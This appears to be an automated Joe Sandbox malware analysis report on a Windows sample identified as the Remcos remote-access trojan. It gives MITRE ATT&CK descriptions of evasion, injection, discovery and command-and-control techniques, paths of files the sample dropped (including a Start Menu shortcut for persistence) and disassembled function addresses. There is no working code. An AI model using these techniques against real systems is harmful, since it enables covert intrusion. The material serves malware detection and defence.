Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. These services, such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, `LogMein`, `AmmyyAdmin`, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report ix8kxoBHDb.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Remcos

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Stealing of Sensitive Information

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\BaConf.ini

C:\Users\user\AppData\Local\Temp\nslD2DA.tmp

C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll

C:\Users\user\AppData\Local\Temp\subfolder1\Leucocytopenia.scr

C:\Users\user\AppData\Local\Temp\tmc.ini

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\skovmandshilsnerne.lnk

C:\Users\user\AppData\Roaming\brugser\brugo\Jettisoned.Fed

C:\Users\user\AppData\Roaming\brugser\brugo\Obstetriker\Gonging.Tri

C:\Users\user\AppData\Roaming\brugser\brugo\Obstetriker\grinagtigere.per

C:\Users\user\AppData\Roaming\brugser\brugo\Obstetriker\sarcosomal.vas

C:\Users\user\AppData\Roaming\brugser\brugo\Ornithoscopist180.ker

Static File Info

Windows Analysis Report
ix8kxoBHDb.exe

Function 004034A5 Relevance: 87.9, APIs: 32, Strings: 18, Instructions: 410
stringfilecomCOMMON

Function 0040558F Relevance: 68.5, APIs: 36, Strings: 3, Instructions: 284
windowclipboardmemoryCOMMON

Function 00405AFA Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Function 00403E86 Relevance: 59.8, APIs: 32, Strings: 2, Instructions: 346
windowstringCOMMON

Function 00403AD8 Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Function 00402F30 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203
memoryCOMMON

Function 0040640A Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 209
stringCOMMON

Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Function 00405450 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Function 0040264A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153
fileCOMMON

Function 00406752 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Function 0040591F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Function 00405F0D Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37
COMMON

Function 73B01777 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON